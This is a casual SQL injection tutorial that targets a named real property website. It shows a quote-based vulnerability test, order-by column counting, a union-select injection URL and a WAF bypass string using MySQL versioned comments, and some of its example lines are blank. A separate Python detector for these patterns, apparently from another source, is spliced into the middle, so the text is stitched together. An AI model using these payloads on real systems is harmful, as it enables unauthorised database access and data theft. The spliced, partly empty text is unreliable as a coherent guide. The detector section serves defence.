Assalamualaikum wr.wb
OK, this time I'm going to share an SQLi local variable tutorial. No need for a long intro, let's get straight to it :v
Get a target ready first.
Here I already have a target, namely:
OK, first we test for the vulnerability :v
To do that, add a single quote (') after the id parameter :v
Next :v
We move on to the order by stage.
What happens?
OK, increase the number from 1 to 2 to 3 and so on, until the site throws an error.
The error shows up at 16.
So we stop at 15.
Now we go straight to union:
http://www.ganeshambuilders.com/property_detail.php?id=2'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--+-
Huh, the number isn't showing up, so we bypass first.
OK, we bypass :v
To do that, add the command +and+mod(9,9)+/*!50000union*/+/*!50000select*/
Example:
There, the number 2 shows up.
OK, now we open the database by putting the DIOS in that number's position :v
Example:
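The defensive counterpart to the steps above, as an added example that is not part of the original post: a log-review helper that URL-decodes a query string and unwraps MySQL versioned comments (`/*!50000...*/`) before matching, so the comment-wrapped `union`/`select` form is flagged the same way as the plain one. The rule names, function names and sample query strings are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# MySQL runs the body of /*!NNNNN ... */ as SQL, so keep the body, drop the wrapper.
VERSIONED = re.compile(r"/\*!\d*(.*?)\*/", re.S)
PLAIN = re.compile(r"/\*.*?\*/", re.S)  # ordinary comments act as whitespace

RULES = {  # hypothetical rule names, matched against the normalized string
    "order_by_probe": re.compile(r"\border\s+by\s+\d+"),
    "quote_then_comment": re.compile(r"'.*(--|#)"),
    "schema_enum": re.compile(r"\binformation_schema\b"),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b"),
}

def normalize(query):
    """Decode twice (double encoding), unwrap comments, collapse whitespace."""
    s = unquote_plus(unquote_plus(query))
    s = VERSIONED.sub(r" \1 ", s)
    s = PLAIN.sub(" ", s)
    return re.sub(r"\s+", " ", s).lower()

def classify(query):
    """Return the sorted names of every rule the normalized query trips."""
    norm = normalize(query)
    return sorted(name for name, rx in RULES.items() if rx.search(norm))

def naive_match(query):
    """Decode-only check, shown for contrast: misses comment-wrapped keywords."""
    return bool(re.search(r"union\s+select", unquote_plus(query).lower()))

# Constructed query strings, as they would appear in a web server access log.
SAMPLES = [
    "id=2",
    "q=student+union+selection",
    "id=2'+order+by+16--+-",
    "id=2%27+and+mod(9,9)+/*!50000union*/+/*!50000select*/+1,2,3--+-",
]

if __name__ == "__main__":
    for q in SAMPLES:
        print(f"{classify(q)!s:45} naive={naive_match(q)!s:5} {q}")
```

Matching like this only tells you the probing happened; the fix on the application side is a parameterized query for the id parameter.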
Just leave a comment, OK.
That's all, bye.